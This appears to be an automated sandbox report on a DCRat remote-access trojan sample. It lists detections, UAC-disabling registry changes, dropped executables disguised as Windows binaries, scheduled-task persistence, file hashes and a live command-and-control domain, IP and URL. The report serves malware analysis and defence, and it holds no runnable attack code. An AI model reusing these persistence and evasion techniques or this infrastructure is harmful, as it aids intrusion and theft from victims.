            Disable UAC(promptonsecuredesktop)
            Source: C:\serversessionmonitor\blockfont.exeRegistry value created: PromptOnSecureDesktop 0Jump to behavior
            Disables UAC (registry)
            Source: C:\serversessionmonitor\blockfont.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blockfont.exe PID: 7076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7508, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7900, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000004.00000002.1784999674.0000000003657000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1870704533.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1870320993.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.1870704533.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1870320993.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1784999674.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1790371382.00000000132BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: blockfont.exe PID: 7076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7508, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: qwhJcOiWbbUoQMvwnJNr.exe PID: 7900, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts111
            Windows Management Instrumentation            		11
            Scripting            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Bypass User Account Control            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory2
            File and Directory Discovery            		Remote Desktop ProtocolData from Removable Media1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		11
            Process Injection            		3
            Obfuscated Files or Information            		Security Account Manager37
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		Login Hook1
            Scheduled Task/Job            		22
            Software Packing            		NTDS131
            Security Software Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets1
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Bypass User Account Control            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502154 Sample: 5P9EdUgv5r.exe Startdate: 31/08/2024 Architecture: WINDOWS Score: 100 50 a1023624.xsph.ru 2->50 56 Multi AV Scanner detection for domain / URL 2->56 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 14 other signatures 2->62 10 5P9EdUgv5r.exe 3 6 2->10         started        13 qwhJcOiWbbUoQMvwnJNr.exe 2 2->13         started        16 qwhJcOiWbbUoQMvwnJNr.exe 2 2->16         started        signatures3 process4 file5 46 C:\serversessionmonitor\blockfont.exe, PE32 10->46 dropped 48 C:\...\1ogacUYksBebmJ8WSR.vbe, data 10->48 dropped 18 wscript.exe 1 10->18         started        72 Multi AV Scanner detection for dropped file 13->72 signatures6 process7 signatures8 54 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->54 21 cmd.exe 1 18->21         started        process9 process10 23 blockfont.exe 2 20 21->23         started        27 conhost.exe 21->27         started        file11 38 C:\Windows\...\qwhJcOiWbbUoQMvwnJNr.exe, PE32 23->38 dropped 40 C:\Recovery\SearchApp.exe, PE32 23->40 dropped 42 C:\Program Files\...\qwhJcOiWbbUoQMvwnJNr.exe, PE32 23->42 dropped 44 5 other malicious files 23->44 dropped 64 Antivirus detection for dropped file 23->64 66 Multi AV Scanner detection for dropped file 23->66 68 Machine Learning detection for dropped file 23->68 70 4 other signatures 23->70 29 qwhJcOiWbbUoQMvwnJNr.exe 23->29         started        32 schtasks.exe 23->32         started        34 schtasks.exe 23->34         started        36 22 other processes 23->36 signatures12 process13 dnsIp14 52 a1023624.xsph.ru 141.8.194.149, 49734, 80 SPRINTHOSTRU Russian Federation 29->52

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            5P9EdUgv5r.exe71%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            5P9EdUgv5r.exe61%VirustotalBrowse
            5P9EdUgv5r.exe100%AviraVBS/Runner.VPG
            5P9EdUgv5r.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\serversessionmonitor\blockfont.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%AviraHEUR/AGEN.1323984
            C:\serversessionmonitor\1ogacUYksBebmJ8WSR.vbe100%AviraVBS/Runner.VPG
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\SearchApp.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%AviraHEUR/AGEN.1323984
            C:\serversessionmonitor\blockfont.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%Joe Sandbox ML
            C:\Recovery\SearchApp.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe68%VirustotalBrowse
            C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe68%VirustotalBrowse
            C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exe68%VirustotalBrowse
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exe68%VirustotalBrowse
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe68%VirustotalBrowse
            C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe68%VirustotalBrowse
            C:\Recovery\SearchApp.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\SearchApp.exe68%VirustotalBrowse
            C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe68%VirustotalBrowse
            C:\serversessionmonitor\blockfont.exe88%ReversingLabsByteCode-MSIL.Ransomware.Prometheus
            C:\serversessionmonitor\blockfont.exe68%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            a1023624.xsph.ru5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://a1023624.xsph.ru100%Avira URL Cloudmalware
            http://a1023624.xsph.ru/100%Avira URL Cloudmalware
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs100%Avira URL Cloudmalware
            https://index.from.sh/pages/game.html0%Avira URL Cloudsafe
            https://cp.sprinthost.ru0%Avira URL Cloudsafe
            http://a1023624.xsph.ru5%VirustotalBrowse
            https://cp.sprinthost.ru0%VirustotalBrowse
            http://a1023624.xsph.ru/5%VirustotalBrowse
            https://cp.sprinthost.ru/auth/login0%VirustotalBrowse
            https://index.from.sh/pages/game.html0%VirustotalBrowse
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8100%Avira URL Cloudmalware
            http://go.mic0%Avira URL Cloudsafe
            https://cp.sprinthost.ru/auth/login0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            a1023624.xsph.ru
            		141.8.194.149
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcstrue
            • Avira URL Cloud: malware
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://a1023624.xsph.ruqwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003292000.00000004.00000800.00020000.00000000.sdmptrue
            • 5%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://a1023624.xsph.ru/qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003263000.00000004.00000800.00020000.00000000.sdmptrue
            • 5%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            https://cp.sprinthost.ruqwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://index.from.sh/pages/game.htmlqwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: malware
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameblockfont.exe, 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://go.micqwhJcOiWbbUoQMvwnJNr.exe, 00000014.00000002.1867548337.0000000001110000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cp.sprinthost.ru/auth/loginqwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            141.8.194.149
            		a1023624.xsph.ruRussian Federation
            		35278SPRINTHOSTRUtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502154
            Start date and time:2024-08-31 09:21:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:5P9EdUgv5r.exe
            renamed because original name is a hash value
            Original Sample Name:1F70E167B93D471AF9DAF333145DB4CD.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@38/21@1/1
            EGA Information:
            • Successful, ratio: 20%
            HCA Information:
            • Successful, ratio: 72%
            • Number of executed functions: 360
            • Number of non-executed functions: 90
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): RuntimeBroker.exe, ShellExperienceHost.exe, winlogon.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe, SearchApp.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target blockfont.exe, PID 7076 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7508 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7552 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7900 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            03:22:10API Interceptor4x Sleep call for process: qwhJcOiWbbUoQMvwnJNr.exe modified
            08:22:04Task SchedulerRun new task: backgroundTaskHostb path: "C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe"
            08:22:05Task SchedulerRun new task: qwhJcOiWbbUoQMvwnJNr path: "C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe"
            08:22:05Task SchedulerRun new task: qwhJcOiWbbUoQMvwnJNrq path: "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
            08:22:05Task SchedulerRun new task: winlogon path: "C:\Program Files (x86)\windows portable devices\winlogon.exe"
            08:22:05Task SchedulerRun new task: winlogonw path: "C:\Program Files (x86)\windows portable devices\winlogon.exe"
            08:22:08Task SchedulerRun new task: backgroundTaskHost path: "C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe"
            08:22:08Task SchedulerRun new task: SearchApp path: "C:\Recovery\SearchApp.exe"
            08:22:08Task SchedulerRun new task: SearchAppS path: "C:\Recovery\SearchApp.exe"

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            141.8.194.149ONkN42VBrA.exeGet hashmaliciousDCRatBrowse
              W1jPemW7dh.exeGet hashmaliciousDCRatBrowse
                5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                  SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                    ZM7nD5Un8l.exeGet hashmaliciousDCRatBrowse
                      zMX3ObXlR6.exeGet hashmaliciousDCRatBrowse
                        jbLwhEMdSh.exeGet hashmaliciousDCRatBrowse
                          Ryf8vHLcLt.exeGet hashmaliciousDCRatBrowse
                            Linux_amd64Get hashmaliciousUnknownBrowse

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SPRINTHOSTRU06wRHV3NYY.exeGet hashmaliciousDCRatBrowse
                              • 141.8.192.103
                              bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              • 141.8.197.42
                              YMtjYvZX2i.exeGet hashmaliciousDCRatBrowse
                              • 141.8.197.42
                              p7oBHwDt23.exeGet hashmaliciousDCRatBrowse
                              • 141.8.197.42
                              pxkGBmsm1Y.exeGet hashmaliciousDCRatBrowse
                              • 141.8.193.236
                              N7lmWFMEgx.exeGet hashmaliciousDCRatBrowse
                              • 141.8.192.126
                              X1BQ0d74HR.exeGet hashmaliciousDCRatBrowse
                              • 141.8.197.42
                              KE4FVpmbfO.exeGet hashmaliciousDCRatBrowse
                              • 141.8.192.151
                              T3sSKdPRf4.exeGet hashmaliciousDCRatBrowse
                              • 141.8.197.42
                              rGTmuDibad.exeGet hashmaliciousDCRatBrowse
                              • 141.8.192.126

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Program Files (x86)\Microsoft Office\Office16\8057c8f30c1a8e

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (643), with no line terminators
                              Category:dropped
                              Size (bytes):643
                              Entropy (8bit):5.907337812318845
                              Encrypted:false
                              SSDEEP:12:6+d4etcQ6mMxSimjpltCJaj9I0kmZWIAAE0pQFki2AjM25nch/D4:f6gc+aa5PkmZU0pKWAjMMch/E
                              MD5:51F1CE390161EFAD98BE030A4B810C35
                              SHA1:97FB4306C7324A0C2943AFB3789319CB4FFFA242
                              SHA-256:31077E6ED57C9ACCA6E84A54E1D3D707E4C78B15D31F684D1C2B076086BF0848
                              SHA-512:C167FD430D8B62DE6D8B776983529EC12F6830062971420A60DF33C212E444502A313DA07C9151EF2BCF6A91C2FE3CA5C21D18317E185975E6A182FDAC273D18
                              Malicious:false
                              Preview:VBN742aV3gjswbtg7RbwyiheKnW9iEMf7qF0MZ2nohwMPROMaaV64ZzwdtwRfbwzTEuGV2ThYxHQwVP2YKiItQkh1SWdmlINv63KgI0hGyhGSjAId32V2oGCdNPDg04xp3fzbEVQTAB4sePRSN9tswVG01rT3xBQ3tbYEKrZhmC1nLT977uS1LF2iY8kXCWg9uB9C1NHgkLFuddphsW6CsZrnizpMHCfQg22JU6GtnwQAAIF4TCoqadQVTVdCi5YhpzOklfNvPMZ5Irnatv3EXzzClg08dELsXsUK3eTxz3aNDUMmrDSxBUK09L8EpOSLBriZWcgObGPdYl8RUNQZvYqDieKsgOHklOMWwwPOgDV5ErbYMruc82anBe11SysN8p2KZmeh7B3sCu81DwfydpmtyjVS5X6sUH7ZyR9kNNe68rkRfAyfS3tTDJVzRLlkFLX5xjCvx5lQLpuG8Ew4jaZbYnWp5JSBl31xUpe68DsXScIXZO1NZrBov5gJMWznmkpRy6vTk06fsCJ5f9QrSFm42MBZIUtmNEurx1icdhmiuf6twloNFIVg8vYm4WLPHUSnRbIobyNucDJXQSmgqfgEsNtCc6iGWXbaMSbUd9wR4lD4lAVluoilxN4EsFLePH

                              C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exe

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Program Files (x86)\Microsoft OneDrive\LogoImages\8057c8f30c1a8e

                              Download File
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (542), with no line terminators
                              Category:dropped
                              Size (bytes):542
                              Entropy (8bit):5.874543997183341
                              Encrypted:false
                              SSDEEP:12:zrNAa4tVOGjo9HmJrOcGNkT6OCkSb8gBrs1h3QEFVEJvK+:6tkGaDo6OCkSb8ggJFV7+
                              MD5:473C13778837169DDA070969CBE1F6D0
                              SHA1:153B237BE4660E8BB28BA33B5A9BDE3C0EBF5F5E
                              SHA-256:6736B67F3A13CA6A0A2631CC44336FAB1455E119EECFD05D87EBD9E0753C3FD4
                              SHA-512:4998C032AAD7B6A76713663E88986B60F4C0CA59974A631EFA1A4417364ADB551D8839C992F50AB2234F4BBCFD73EF9016E90CEAA35D69B5445BCB4F473CF869
                              Malicious:false
